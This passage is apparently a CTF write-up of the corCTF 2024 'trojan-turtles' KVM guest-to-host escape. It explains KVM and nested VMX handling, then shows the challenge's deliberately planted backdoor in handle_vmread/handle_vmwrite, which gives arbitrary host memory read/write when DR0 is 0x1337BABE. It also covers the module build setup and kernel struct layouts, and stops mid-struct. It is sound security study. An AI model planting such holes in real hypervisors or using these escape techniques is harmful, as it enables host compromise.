KVM Escape via Nested Virtualization: Reproducing corCTF 2024 trojan-turtles

References

https://zolutal.github.io/corctf-trojan-turtles/
https://eqqie.cn/index.php/archives/1972

This article was first published on the Qi'anxin Butian community: https://forum.butian.net/question/1370

KVM (Kernel-based Virtual Machine)

This section explains what KVM (Kernel-based Virtual Machine) is, how it is implemented, and how it is used together with QEMU (Quick Emulator).

What KVM is

KVM is a virtualization technology built into the Linux kernel that lets the kernel itself act as a virtual machine monitor (VMM), or hypervisor. Its main purpose is to provide a uniform interface through which user-space programs can use the hardware virtualization extensions (Intel VMX, AMD SVM) to create and manage virtual machines.

How KVM is implemented

KVM is exposed through a character device, /dev/kvm. The driver provides a set of ioctl commands for managing and controlling the state and behavior of virtual machines (VMs).

ioctl commands

ioctl is a generic mechanism for passing control information between user space and the kernel. The KVM driver offers many ioctl commands for configuring VM state, setting register values, setting up the guest memory map, controlling VM execution, and so on.

  • KVM_SET_REGS:
    • Sets a vCPU's register state.
    • A user-space program uses this ioctl to write values into the vCPU's general-purpose registers (a short sketch follows this list).
  • API documentation:
    • The KVM API is documented in detail in the kernel documentation: https://docs.kernel.org/virt/kvm/api.html
    • It describes the available ioctl commands, their argument structures, and how to use them to control a VM.
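
For instance, reading and rewriting a vCPU's registers through this ioctl looks roughly like the sketch below (vcpu_fd is assumed to come from KVM_CREATE_VCPU; error handling omitted):

#include <linux/kvm.h>
#include <sys/ioctl.h>

/* Sketch: advance the guest's instruction pointer on an existing vCPU fd. */
void skip_one_byte(int vcpu_fd)
{
    struct kvm_regs regs;

    ioctl(vcpu_fd, KVM_GET_REGS, &regs);   /* read the current GPR state  */
    regs.rip += 1;                         /* modify it in user space     */
    ioctl(vcpu_fd, KVM_SET_REGS, &regs);   /* write it back into the vCPU */
}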

KVM build options

KVM can be integrated into the Linux kernel in different ways, depending on the kernel configuration:

  • Built into the kernel:

    • If CONFIG_KVM_INTEL is set to y, KVM's Intel support is compiled into the kernel image.
    • KVM is then part of the kernel and can be used without loading any extra module.
  • Built as a kernel module:

    • If CONFIG_KVM_INTEL is set to m, it is built as a loadable kernel module.
    • KVM can then be enabled or disabled by loading or unloading the module, which is more flexible.

QEMU combined with KVM

QEMU is a generic full-system emulator that can emulate many hardware architectures. When combined with KVM, QEMU uses KVM's hardware acceleration to make guests run much faster.

  • With KVM:

    • When QEMU is started with --enable-kvm, it uses the KVM API to run the guest.
    • QEMU then relies on the hardware virtualization extensions instead of emulating everything in software.
    • The result is better guest performance and lower CPU overhead.
  • Without KVM:

    • Without --enable-kvm, QEMU runs the guest through pure software emulation.
    • Performance is usually much lower, because QEMU must emulate every hardware detail in user space.

How it works

  1. Initialization: when KVM starts, it checks that the hardware supports virtualization and initializes the necessary data structures.
  2. Creating a VM: a user-space application asks the kernel, through system calls, to create a new virtual machine instance.
  3. Configuring the VM: the application configures the VM's hardware (memory size, number of CPUs, ...) and loads the operating system image through further calls.
  4. Running the VM: once configured, the application starts the VM; KVM takes over its execution and makes sure it runs correctly.
  5. Privileged-instruction handling: when the guest tries to execute a privileged instruction, it is trapped and handed to KVM, which either emulates it on the host or lets the hardware execute it directly where supported. (A minimal user-space sketch of this flow follows the list.)
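
To make this flow concrete, here is a minimal user-space sketch (unrelated to the challenge; error handling omitted, and the tiny real-mode guest program is a made-up example) that creates a VM through /dev/kvm, gives it one page of memory and one vCPU, and runs it until it halts:

#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <linux/kvm.h>

int main(void)
{
    /* tiny 16-bit guest: write 'A' to port 0x3f8, then halt */
    const uint8_t guest_code[] = {
        0xba, 0xf8, 0x03,  /* mov $0x3f8, %dx */
        0xb0, 'A',         /* mov $'A',   %al */
        0xee,              /* out %al, (%dx)  */
        0xf4               /* hlt             */
    };

    int kvm = open("/dev/kvm", O_RDWR);              /* 1. talk to the KVM driver */
    int vm  = ioctl(kvm, KVM_CREATE_VM, 0);          /* 2. create a VM instance   */

    /* 3. configure the VM: one page of guest memory at guest-physical 0x1000 */
    void *mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                     MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    memcpy(mem, guest_code, sizeof(guest_code));
    struct kvm_userspace_memory_region region = {
        .slot            = 0,
        .guest_phys_addr = 0x1000,
        .memory_size     = 0x1000,
        .userspace_addr  = (uint64_t)mem,
    };
    ioctl(vm, KVM_SET_USER_MEMORY_REGION, &region);

    int vcpu = ioctl(vm, KVM_CREATE_VCPU, 0);        /* one vCPU */
    int run_size = ioctl(kvm, KVM_GET_VCPU_MMAP_SIZE, 0);
    struct kvm_run *run = mmap(NULL, run_size, PROT_READ | PROT_WRITE,
                               MAP_SHARED, vcpu, 0); /* shared exit-info area */

    /* point cs:rip at the code (real mode), using KVM_SET_SREGS/KVM_SET_REGS */
    struct kvm_sregs sregs;
    ioctl(vcpu, KVM_GET_SREGS, &sregs);
    sregs.cs.base = 0;
    sregs.cs.selector = 0;
    ioctl(vcpu, KVM_SET_SREGS, &sregs);
    struct kvm_regs regs = { .rip = 0x1000, .rflags = 2 };
    ioctl(vcpu, KVM_SET_REGS, &regs);

    /* 4./5. run the guest; privileged operations come back to us as VM exits */
    for (;;) {
        ioctl(vcpu, KVM_RUN, 0);
        if (run->exit_reason == KVM_EXIT_IO)
            putchar(*((char *)run + run->io.data_offset));  /* prints 'A' */
        else if (run->exit_reason == KVM_EXIT_HLT)
            break;
    }
    return 0;
}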

Nested virtualization (running a VM inside a VM)

When we say "the processor can now execute VMX (virtualization) instructions", we mean the CPU is allowed to execute a family of special instructions dedicated to virtualization.

  1. The VMX instruction set:

    • Intel processors have a dedicated set of virtualization instructions called VMX (Virtual Machine Extensions).
    • They include VMXON, VMXOFF, VMLAUNCH, VMRESUME, VMREAD, VMWRITE, and so on.
  2. What these instructions do:

    • They let an operating system or hypervisor (e.g. VMware, VirtualBox) create and manage virtual machines.
    • They provide hardware-level support, which makes virtualization more efficient and safer.
  3. Before vs. after enabling the VMXE bit:

    • Before CR4.VMXE is set: attempting any of these VMX instructions raises an exception (an invalid-opcode fault).
    • After CR4.VMXE is set: the processor recognizes and executes them.
  4. A practical example:
    Suppose you want to run a virtual machine on your computer:

    • Without VMXE: the VM software can only emulate the guest purely in software, which is slow.
    • With VMXE: the VM software can use the hardware instructions and run the guest far more efficiently.

How a guest's VMX instructions are handled under nested virtualization (i.e. operations on the VM inside the VM)

Using the VMX instructions

  1. Initial state:

    • L0: the host VMM (hypervisor)
    • L1: the first-level guest, running its own VMM
    • L2: the second-level guest (optional)
  2. L1 executes a VMX instruction:

    a. Instruction interception:

    • L1 attempts to execute a VMX instruction
    • The hardware detects that this instruction needs special handling

    b. VM exit to L0:

    • Control transfers from L1 to the L0 VMM
    • The L0 VMM receives information about the exit reason

    c. L0 VMM analysis:

    • L0 determines that the exit was caused by a VMX instruction
    • It checks L1's privileges and current state

    d. Emulated execution:

    • The L0 VMM does not execute the instruction directly
    • Instead, it emulates the instruction's effect

    e. Virtual VMCS operations:

    • If the instruction touches a VMCS, L0 operates on the virtual VMCS assigned to L1
    • The virtual VMCS is a "shadow", a software copy of a real VMCS

    f. State update:

    • L0 updates L1's virtual state so that it looks as if the instruction had executed

    g. VM entry back into L1:

    • Once emulation is done, L0 returns control to L1
    • L1 continues running as if it had executed the VMX instruction itself
  3. Special case - L1 creates L2:

    a. L1 executes VMLAUNCH/VMRESUME:

    • Used to start or resume the L2 guest

    b. L0 intercepts and emulates:

    • L0 creates or configures a new virtual VMCS for L2
    • It sets up the necessary nested-virtualization structures

    c. Real VM entry:

    • L0 performs the actual VM entry into L2
    • L2 starts running, believing it is managed directly by L1
  4. L2 performs an operation that requires a VM exit:

    a. Hardware VM exit to L0:

    • Control goes directly to L0, bypassing L1

    b. L0 decides:

    • Whether L1 needs to be notified
    • If so, it synthesizes a VM exit from L2 to L1
    • Otherwise, L0 handles the exit itself and resumes L2
  5. Optimizations and hardware support:

    • Modern processors provide features such as VMCS shadowing
    • These reduce the number of VM exits and improve performance
  6. The cycle repeats:

    • This process runs continuously, handling all of L1's and L2's operations

The qcow2 image / uploading the exploit / debugging

  • Install the QEMU utilities
# On Debian/Ubuntu:
sudo apt-get install qemu-utils

Next, inspect the .qcow2 file:

qemu-img info chall.qcow2
  • Mount the image to inspect and modify its contents
sudo guestmount -a chall.qcow2 -m /dev/sda /mnt/qcow2
cd /mnt/qcow2


tree -L 2

Inside we find the nested guest's kernel image, its file system, and its startup script. The plan: unpack the guest's file system, add our exploit module to it, repack it, and boot the VM again.
Install the matching kernel headers; we need them to build a kernel module for the guest kernel, which we will load inside the guest to escape to the host.

sudo dpkg -i linux-hwe-5.15-headers-5.15.0-107_5.15.0-107.117~20.04.1_all.deb
sudo dpkg -i linux-headers-5.15.0-107-generic_5.15.0-107.117~20.04.1_amd64.deb
ls /usr/lib/modules/5.15.0-107-generic/build

The Makefile alongside exp.c; the /usr/lib/modules/5.15.0-107-generic/build directory normally exists once the headers are installed, and if it doesn't, just create it.


obj-m += exp.o
KDIR := /usr/lib/modules/5.15.0-107-generic/build
PWD := $(shell pwd)

all:
	make -C $(KDIR) M=$(PWD) modules

clean:
	make -C $(KDIR) M=$(PWD) clean

Then run make to build exp.ko, copy it into the guest's file system, repack the image, boot the guest, and insmod the module.

The vulnerability

When the guest executes VMX instructions (i.e. uses nested virtualization), those instructions are recognized as needing special handling and trigger a VM exit, and the host VMM then emulates them.

diff

The patch changes the handle_vmread and handle_vmwrite functions:

__int64 __fastcall handle_vmwrite(__int64 a1, int a2, int a3, int a4, int a5, int a6)
{
  ...
  if ( kvm_get_dr(a1, 0LL) == 0x1337BABE )
  {
    dr = kvm_get_dr(a1, 1LL);
    *(_QWORD *)(v7 + 8 * dr) = kvm_get_dr(a1, 2LL);
  }
  ...
}
__int64 __fastcall handle_vmread(__int64 a1, int a2, int a3, int a4, int a5, int a6)
{
  ...
  if ( kvm_get_dr(a1, 0LL) == 0x1337BABE )
  {
    dr = kvm_get_dr(a1, 1LL);
    kvm_set_dr(a1, 2LL, *(_QWORD *)(v6 + 8 * dr));
  }
  ...
}

static inline struct vmcs12 *get_shadow_vmcs12(struct kvm_vcpu *vcpu)
{
	return to_vmx(vcpu)->nested.cached_shadow_vmcs12;
}

static __always_inline struct vcpu_vmx *to_vmx(struct kvm_vcpu *vcpu)
{
	return container_of(vcpu, struct vcpu_vmx, vcpu);
}

#define container_of(ptr, type, member) ({				\
	void *__mptr = (void *)(ptr);					\
	static_assert(__same_type(*(ptr), ((type *)0)->member) ||	\
		      __same_type(*(ptr), void),			\
		      "pointer type mismatch in container_of()");	\
	((type *)(__mptr - offsetof(type, member))); })

The code above is what decides whether nested virtualization is involved:

  1. Guest mode:
    In nested virtualization, "guest mode" refers to the situation where a virtual machine is itself running a virtual machine monitor (VMM) inside it - in other words, a VM inside a VM.

  2. Nesting levels:

    • L0: the bare hardware and the primary hypervisor
    • L1: a VM running on L0 that is itself a VMM
    • L2: a VM running inside the L1 guest
  3. is_guest_mode(vcpu):
    This helper checks whether the given virtual CPU (vcpu) is in guest mode; if it is, an L2 guest is currently running.

  4. VMCS (Virtual Machine Control Structure):
    The VMCS is the data structure Intel's virtualization technology uses to control a virtual machine's behavior.

  5. vmcs12:
    In nested virtualization, vmcs12 is the VMCS the L1 VMM uses to manage its L2 guest.

  6. What the code does:

    • If the vCPU is in guest mode (an L2 guest is running), get_shadow_vmcs12(vcpu) returns the shadow VMCS.
    • Otherwise, get_vmcs12(vcpu) returns the regular vmcs12.

Relevant source code and structures


struct nested_vmx {
	/* Has the level1 guest done vmxon? */
	bool vmxon;
	gpa_t vmxon_ptr;
	bool pml_full;

	/* The guest-physical address of the current VMCS L1 keeps for L2 */
	gpa_t current_vmptr;
	/*
	 * Cache of the guest's VMCS, existing outside of guest memory.
	 * Loaded from guest memory during VMPTRLD. Flushed to guest
	 * memory during VMCLEAR and VMPTRLD.
	 */
	struct vmcs12 *cached_vmcs12;
	/*
	 * Cache of the guest's shadow VMCS, existing outside of guest
	 * memory. Loaded from guest memory during VM entry. Flushed
	 * to guest memory during VM exit.
	 */
	struct vmcs12 *cached_shadow_vmcs12;

	/*
	 * GPA to HVA cache for accessing vmcs12->vmcs_link_pointer
	 */
	struct gfn_to_hva_cache shadow_vmcs12_cache;

	/*
	 * GPA to HVA cache for VMCS12
	 */
	struct gfn_to_hva_cache vmcs12_cache;

	/*
	 * Indicates if the shadow vmcs or enlightened vmcs must be updated
	 * with the data held by struct vmcs12.
	 */
	bool need_vmcs12_to_shadow_sync;
	bool dirty_vmcs12;

	/*
	 * Indicates whether MSR bitmap for L2 needs to be rebuilt due to
	 * changes in MSR bitmap for L1 or switching to a different L2. Note,
	 * this flag can only be used reliably in conjunction with a paravirt L1
	 * which informs L0 whether any changes to MSR bitmap for L2 were done
	 * on its side.
	 */
	bool force_msr_bitmap_recalc;

	/*
	 * Indicates lazily loaded guest state has not yet been decached from
	 * vmcs02.
	 */
	bool need_sync_vmcs02_to_vmcs12_rare;

	/*
	 * vmcs02 has been initialized, i.e. state that is constant for
	 * vmcs02 has been written to the backing VMCS.  Initialization
	 * is delayed until L1 actually attempts to run a nested VM.
	 */
	bool vmcs02_initialized;

	bool change_vmcs01_virtual_apic_mode;
	bool reload_vmcs01_apic_access_page;
	bool update_vmcs01_cpu_dirty_logging;
	bool update_vmcs01_apicv_status;

	/*
	 * Enlightened VMCS has been enabled. It does not mean that L1 has to
	 * use it. However, VMX features available to L1 will be limited based
	 * on what the enlightened VMCS supports.
	 */
	bool enlightened_vmcs_enabled;

	/* L2 must run next, and mustn't decide to exit to L1. */
	bool nested_run_pending;

	/* Pending MTF VM-exit into L1.  */
	bool mtf_pending;

	struct loaded_vmcs vmcs02;

	/*
	 * Guest pages referred to in the vmcs02 with host-physical
	 * pointers, so we must keep them pinned while L2 runs.
	 */
	struct kvm_host_map apic_access_page_map;
	struct kvm_host_map virtual_apic_map;
	struct kvm_host_map pi_desc_map;

	struct kvm_host_map msr_bitmap_map;

	struct pi_desc *pi_desc;
	bool pi_pending;
	u16 posted_intr_nv;

	struct hrtimer preemption_timer;
	u64 preemption_timer_deadline;
	bool has_preemption_timer_deadline;
	bool preemption_timer_expired;

	/*
	 * Used to snapshot MSRs that are conditionally loaded on VM-Enter in
	 * order to propagate the guest's pre-VM-Enter value into vmcs02.  For
	 * emulation of VMLAUNCH/VMRESUME, the snapshot will be of L1's value.
	 * For KVM_SET_NESTED_STATE, the snapshot is of L2's value, _if_
	 * userspace restores MSRs before nested state.  If userspace restores
	 * MSRs after nested state, the snapshot holds garbage, but KVM can't
	 * detect that, and the garbage value in vmcs02 will be overwritten by
	 * MSR restoration in any case.
	 */
	u64 pre_vmenter_debugctl;
	u64 pre_vmenter_bndcfgs;

	/* to migrate it to L1 if L2 writes to L1's CR8 directly */
	int l1_tpr_threshold;

	u16 vpid02;
	u16 last_vpid;

	struct nested_vmx_msrs msrs;

	/* SMM related state */
	struct {
		/* in VMX operation on SMM entry? */
		bool vmxon;
		/* in guest mode on SMM entry? */
		bool guest_mode;
	} smm;

#ifdef CONFIG_KVM_HYPERV
	gpa_t hv_evmcs_vmptr;
	struct kvm_host_map hv_evmcs_map;
	struct hv_enlightened_vmcs *hv_evmcs;
#endif
};

struct kvm_vcpu {
	struct kvm *kvm;
#ifdef CONFIG_PREEMPT_NOTIFIERS
	struct preempt_notifier preempt_notifier;
#endif
	int cpu;
	int vcpu_id; /* id given by userspace at creation */
	int vcpu_idx; /* index into kvm->vcpu_array */
	int ____srcu_idx; /* Don't use this directly.  You've been warned. */
#ifdef CONFIG_PROVE_RCU
	int srcu_depth;
#endif
	int mode;
	u64 requests;
	unsigned long guest_debug;

	struct mutex mutex;
	struct kvm_run *run;

#ifndef __KVM_HAVE_ARCH_WQP
	struct rcuwait wait;
#endif
	struct pid __rcu *pid;
	int sigset_active;
	sigset_t sigset;
	unsigned int halt_poll_ns;
	bool valid_wakeup;

#ifdef CONFIG_HAS_IOMEM
	int mmio_needed;
	int mmio_read_completed;
	int mmio_is_write;
	int mmio_cur_fragment;
	int mmio_nr_fragments;
	struct kvm_mmio_fragment mmio_fragments[KVM_MAX_MMIO_FRAGMENTS];
#endif

#ifdef CONFIG_KVM_ASYNC_PF
	struct {
		u32 queued;
		struct list_head queue;
		struct list_head done;
		spinlock_t lock;
	} async_pf;
#endif

#ifdef CONFIG_HAVE_KVM_CPU_RELAX_INTERCEPT
	/*
	 * Cpu relax intercept or pause loop exit optimization
	 * in_spin_loop: set when a vcpu does a pause loop exit
	 *  or cpu relax intercepted.
	 * dy_eligible: indicates whether vcpu is eligible for directed yield.
	 */
	struct {
		bool in_spin_loop;
		bool dy_eligible;
	} spin_loop;
#endif
	bool preempted;
	bool ready;
	struct kvm_vcpu_arch arch;
	struct kvm_vcpu_stat stat;
	char stats_id[KVM_STATS_NAME_SIZE];
	struct kvm_dirty_ring dirty_ring;

	/*
	 * The most recently used memslot by this vCPU and the slots generation
	 * for which it is valid.
	 * No wraparound protection is needed since generations won't overflow in
	 * thousands of years, even assuming 1M memslot operations per second.
	 */
	struct kvm_memory_slot *last_used_slot;
	u64 last_used_slot_gen;
};


struct kvm_vcpu_arch {
	/*
	 * rip and regs accesses must go through
	 * kvm_{register,rip}_{read,write} functions.
	 */
	unsigned long regs[NR_VCPU_REGS];
	u32 regs_avail;
	u32 regs_dirty;

	unsigned long cr0;
	unsigned long cr0_guest_owned_bits;
	unsigned long cr2;
	unsigned long cr3;
	unsigned long cr4;
	unsigned long cr4_guest_owned_bits;
	unsigned long cr4_guest_rsvd_bits;
	unsigned long cr8;
	u32 host_pkru;
	u32 pkru;
	u32 hflags;
	u64 efer;
	u64 apic_base;
	struct kvm_lapic *apic;    /* kernel irqchip context */
	bool load_eoi_exitmap_pending;
	DECLARE_BITMAP(ioapic_handled_vectors, 256);
	unsigned long apic_attention;
	int32_t apic_arb_prio;
	int mp_state;
	u64 ia32_misc_enable_msr;
	u64 smbase;
	u64 smi_count;
	bool at_instruction_boundary;
	bool tpr_access_reporting;
	bool xfd_no_write_intercept;
	u64 ia32_xss;
	u64 microcode_version;
	u64 arch_capabilities;
	u64 perf_capabilities;

	/*
	 * Paging state of the vcpu
	 *
	 * If the vcpu runs in guest mode with two level paging this still saves
	 * the paging mode of the l1 guest. This context is always used to
	 * handle faults.
	 */
	struct kvm_mmu *mmu;

	/* Non-nested MMU for L1 */
	struct kvm_mmu root_mmu;

	/* L1 MMU when running nested */
	struct kvm_mmu guest_mmu;

	/*
	 * Paging state of an L2 guest (used for nested npt)
	 *
	 * This context will save all necessary information to walk page tables
	 * of an L2 guest. This context is only initialized for page table
	 * walking and not for faulting since we never handle l2 page faults on
	 * the host.
	 */
	struct kvm_mmu nested_mmu;

	/*
	 * Pointer to the mmu context currently used for
	 * gva_to_gpa translations.
	 */
	struct kvm_mmu *walk_mmu;

	struct kvm_mmu_memory_cache mmu_pte_list_desc_cache;
	struct kvm_mmu_memory_cache mmu_shadow_page_cache;
	struct kvm_mmu_memory_cache mmu_shadowed_info_cache;
	struct kvm_mmu_memory_cache mmu_page_header_cache;

	/*
	 * QEMU userspace and the guest each have their own FPU state.
	 * In vcpu_run, we switch between the user and guest FPU contexts.
	 * While running a VCPU, the VCPU thread will have the guest FPU
	 * context.
	 *
	 * Note that while the PKRU state lives inside the fpu registers,
	 * it is switched out separately at VMENTER and VMEXIT time. The
	 * "guest_fpstate" state here contains the guest FPU context, with the
	 * host PRKU bits.
	 */
	struct fpu_guest guest_fpu;

	u64 xcr0;
	u64 guest_supported_xcr0;

	struct kvm_pio_request pio;
	void *pio_data;
	void *sev_pio_data;
	unsigned sev_pio_count;

	u8 event_exit_inst_len;

	bool exception_from_userspace;

	/* Exceptions to be injected to the guest. */
	struct kvm_queued_exception exception;
	/* Exception VM-Exits to be synthesized to L1. */
	struct kvm_queued_exception exception_vmexit;

	struct kvm_queued_interrupt {
		bool injected;
		bool soft;
		u8 nr;
	} interrupt;

	int halt_request; /* real mode on Intel only */

	int cpuid_nent;
	struct kvm_cpuid_entry2 *cpuid_entries;
	struct kvm_hypervisor_cpuid kvm_cpuid;
	bool is_amd_compatible;

	/*
	 * FIXME: Drop this macro and use KVM_NR_GOVERNED_FEATURES directly
	 * when "struct kvm_vcpu_arch" is no longer defined in an
	 * arch/x86/include/asm header.  The max is mostly arbitrary, i.e.
	 * can be increased as necessary.
	 */
#define KVM_MAX_NR_GOVERNED_FEATURES BITS_PER_LONG

	/*
	 * Track whether or not the guest is allowed to use features that are
	 * governed by KVM, where "governed" means KVM needs to manage state
	 * and/or explicitly enable the feature in hardware.  Typically, but
	 * not always, governed features can be used by the guest if and only
	 * if both KVM and userspace want to expose the feature to the guest.
	 */
	struct {
		DECLARE_BITMAP(enabled, KVM_MAX_NR_GOVERNED_FEATURES);
	} governed_features;

	u64 reserved_gpa_bits;
	int maxphyaddr;

	/* emulate context */

	struct x86_emulate_ctxt *emulate_ctxt;
	bool emulate_regs_need_sync_to_vcpu;
	bool emulate_regs_need_sync_from_vcpu;
	int (*complete_userspace_io)(struct kvm_vcpu *vcpu);

	gpa_t time;
	struct pvclock_vcpu_time_info hv_clock;
	unsigned int hw_tsc_khz;
	struct gfn_to_pfn_cache pv_time;
	/* set guest stopped flag in pvclock flags field */
	bool pvclock_set_guest_stopped_request;

	struct {
		u8 preempted;
		u64 msr_val;
		u64 last_steal;
		struct gfn_to_hva_cache cache;
	} st;

	u64 l1_tsc_offset;
	u64 tsc_offset; /* current tsc offset */
	u64 last_guest_tsc;
	u64 last_host_tsc;
	u64 tsc_offset_adjustment;
	u64 this_tsc_nsec;
	u64 this_tsc_write;
	u64 this_tsc_generation;
	bool tsc_catchup;
	bool tsc_always_catchup;
	s8 virtual_tsc_shift;
	u32 virtual_tsc_mult;
	u32 virtual_tsc_khz;
	s64 ia32_tsc_adjust_msr;
	u64 msr_ia32_power_ctl;
	u64 l1_tsc_scaling_ratio;
	u64 tsc_scaling_ratio; /* current scaling ratio */

	atomic_t nmi_queued;  /* unprocessed asynchronous NMIs */
	/* Number of NMIs pending injection, not including hardware vNMIs. */
	unsigned int nmi_pending;
	bool nmi_injected;    /* Trying to inject an NMI this entry */
	bool smi_pending;    /* SMI queued after currently running handler */
	u8 handling_intr_from_guest;

	struct kvm_mtrr mtrr_state;
	u64 pat;

	unsigned switch_db_regs;
	unsigned long db[KVM_NR_DB_REGS];    //  #define KVM_NR_DB_REGS	4
	unsigned long dr6;
	unsigned long dr7;
	unsigned long eff_db[KVM_NR_DB_REGS];
	unsigned long guest_debug_dr7;
	u64 msr_platform_info;
	u64 msr_misc_features_enables;

	u64 mcg_cap;
	u64 mcg_status;
	u64 mcg_ctl;
	u64 mcg_ext_ctl;
	u64 *mce_banks;
	u64 *mci_ctl2_banks;

	/* Cache MMIO info */
	u64 mmio_gva;
	unsigned mmio_access;
	gfn_t mmio_gfn;
	u64 mmio_gen;

	struct kvm_pmu pmu;

	/* used for guest single stepping over the given code position */
	unsigned long singlestep_rip;

#ifdef CONFIG_KVM_HYPERV
	bool hyperv_enabled;
	struct kvm_vcpu_hv *hyperv;
#endif
#ifdef CONFIG_KVM_XEN
	struct kvm_vcpu_xen xen;
#endif
	cpumask_var_t wbinvd_dirty_mask;

	unsigned long last_retry_eip;
	unsigned long last_retry_addr;

	struct {
		bool halted;
		gfn_t gfns[ASYNC_PF_PER_VCPU];
		struct gfn_to_hva_cache data;
		u64 msr_en_val; /* MSR_KVM_ASYNC_PF_EN */
		u64 msr_int_val; /* MSR_KVM_ASYNC_PF_INT */
		u16 vec;
		u32 id;
		bool send_user_only;
		u32 host_apf_flags;
		bool delivery_as_pf_vmexit;
		bool pageready_pending;
	} apf;

	/* OSVW MSRs (AMD only) */
	struct {
		u64 length;
		u64 status;
	} osvw;

	struct {
		u64 msr_val;
		struct gfn_to_hva_cache data;
	} pv_eoi;

	u64 msr_kvm_poll_control;

	/* set at EPT violation at this point */
	unsigned long exit_qualification;

	/* pv related host specific info */
	struct {
		bool pv_unhalted;
	} pv;

	int pending_ioapic_eoi;
	int pending_external_vector;

	/* be preempted when it's in kernel-mode(cpl=0) */
	bool preempted_in_kernel;

	/* Flush the L1 Data cache for L1TF mitigation on VMENTER */
	bool l1tf_flush_l1d;

	/* Host CPU on which VM-entry was most recently attempted */
	int last_vmentry_cpu;

	/* AMD MSRC001_0015 Hardware Configuration */
	u64 msr_hwcr;

	/* pv related cpuid info */
	struct {
		/*
		 * value of the eax register in the KVM_CPUID_FEATURES CPUID
		 * leaf.
		 */
		u32 features;

		/*
		 * indicates whether pv emulation should be disabled if features
		 * are not present in the guest's cpuid
		 */
		bool enforce;
	} pv_cpuid;

	/* Protected Guests */
	bool guest_state_protected;

	/*
	 * Set when PDPTS were loaded directly by the userspace without
	 * reading the guest memory
	 */
	bool pdptrs_from_userspace;

#if IS_ENABLED(CONFIG_HYPERV)
	hpa_t hv_root_tdp;
#endif
};


#define HF_GUEST_MASK		(1 << 0) /* VCPU is in guest-mode */

static inline bool is_guest_mode(struct kvm_vcpu *vcpu)
{
	return vcpu->arch.hflags & HF_GUEST_MASK;
}

struct __packed vmcs12 {
	/* According to the Intel spec, a VMCS region must start with the
	 * following two fields. Then follow implementation-specific data.
	 */
	struct vmcs_hdr hdr;
	u32 abort;

	u32 launch_state; /* set to 0 by VMCLEAR, to 1 by VMLAUNCH */
	u32 padding[7]; /* room for future expansion */

	u64 io_bitmap_a;
	u64 io_bitmap_b;
	u64 msr_bitmap;
	u64 vm_exit_msr_store_addr;
	u64 vm_exit_msr_load_addr;
	u64 vm_entry_msr_load_addr;
	u64 tsc_offset;
	u64 virtual_apic_page_addr;
	u64 apic_access_addr;
	u64 posted_intr_desc_addr;
	u64 ept_pointer;
	u64 eoi_exit_bitmap0;
	u64 eoi_exit_bitmap1;
	u64 eoi_exit_bitmap2;
	u64 eoi_exit_bitmap3;
	u64 xss_exit_bitmap;
	u64 guest_physical_address;
	u64 vmcs_link_pointer;
	u64 guest_ia32_debugctl;
	u64 guest_ia32_pat;
	u64 guest_ia32_efer;
	u64 guest_ia32_perf_global_ctrl;
	u64 guest_pdptr0;
	u64 guest_pdptr1;
	u64 guest_pdptr2;
	u64 guest_pdptr3;
	u64 guest_bndcfgs;
	u64 host_ia32_pat;
	u64 host_ia32_efer;
	u64 host_ia32_perf_global_ctrl;
	u64 vmread_bitmap;
	u64 vmwrite_bitmap;
	u64 vm_function_control;
	u64 eptp_list_address;
	u64 pml_address;
	u64 encls_exiting_bitmap;
	u64 tsc_multiplier;
	u64 padding64[1]; /* room for future expansion */
	/*
	 * To allow migration of L1 (complete with its L2 guests) between
	 * machines of different natural widths (32 or 64 bit), we cannot have
	 * unsigned long fields with no explicit size. We use u64 (aliased
	 * natural_width) instead. Luckily, x86 is little-endian.
	 */
	natural_width cr0_guest_host_mask;
	natural_width cr4_guest_host_mask;
	natural_width cr0_read_shadow;
	natural_width cr4_read_shadow;
	natural_width dead_space[4]; /* Last remnants of cr3_target_value[0-3]. */
	natural_width exit_qualification;
	natural_width guest_linear_address;
	natural_width guest_cr0;
	natural_width guest_cr3;
	natural_width guest_cr4;
	natural_width guest_es_base;
	natural_width guest_cs_base;
	natural_width guest_ss_base;
	natural_width guest_ds_base;
	natural_width guest_fs_base;
	natural_width guest_gs_base;
	natural_width guest_ldtr_base;
	natural_width guest_tr_base;
	natural_width guest_gdtr_base;
	natural_width guest_idtr_base;
	natural_width guest_dr7;
	natural_width guest_rsp;
	natural_width guest_rip;
	natural_width guest_rflags;
	natural_width guest_pending_dbg_exceptions;
	natural_width guest_sysenter_esp;
	natural_width guest_sysenter_eip;
	natural_width host_cr0;
	natural_width host_cr3;
	natural_width host_cr4;
	natural_width host_fs_base;
	natural_width host_gs_base;
	natural_width host_tr_base;
	natural_width host_gdtr_base;
	natural_width host_idtr_base;
	natural_width host_ia32_sysenter_esp;
	natural_width host_ia32_sysenter_eip;
	natural_width host_rsp;
	natural_width host_rip;
	natural_width paddingl[8]; /* room for future expansion */
	u32 pin_based_vm_exec_control;
	u32 cpu_based_vm_exec_control;
	u32 exception_bitmap;
	u32 page_fault_error_code_mask;
	u32 page_fault_error_code_match;
	u32 cr3_target_count;
	u32 vm_exit_controls;
	u32 vm_exit_msr_store_count;
	u32 vm_exit_msr_load_count;
	u32 vm_entry_controls;
	u32 vm_entry_msr_load_count;
	u32 vm_entry_intr_info_field;
	u32 vm_entry_exception_error_code;
	u32 vm_entry_instruction_len;
	u32 tpr_threshold;
	u32 secondary_vm_exec_control;
	u32 vm_instruction_error;
	u32 vm_exit_reason;
	u32 vm_exit_intr_info;
	u32 vm_exit_intr_error_code;
	u32 idt_vectoring_info_field;
	u32 idt_vectoring_error_code;
	u32 vm_exit_instruction_len;
	u32 vmx_instruction_info;
	u32 guest_es_limit;
	u32 guest_cs_limit;
	u32 guest_ss_limit;
	u32 guest_ds_limit;
	u32 guest_fs_limit;
	u32 guest_gs_limit;
	u32 guest_ldtr_limit;
	u32 guest_tr_limit;
	u32 guest_gdtr_limit;
	u32 guest_idtr_limit;
	u32 guest_es_ar_bytes;
	u32 guest_cs_ar_bytes;
	u32 guest_ss_ar_bytes;
	u32 guest_ds_ar_bytes;
	u32 guest_fs_ar_bytes;
	u32 guest_gs_ar_bytes;
	u32 guest_ldtr_ar_bytes;
	u32 guest_tr_ar_bytes;
	u32 guest_interruptibility_info;
	u32 guest_activity_state;
	u32 guest_sysenter_cs;
	u32 host_ia32_sysenter_cs;
	u32 vmx_preemption_timer_value;
	u32 padding32[7]; /* room for future expansion */
	u16 virtual_processor_id;
	u16 posted_intr_nv;
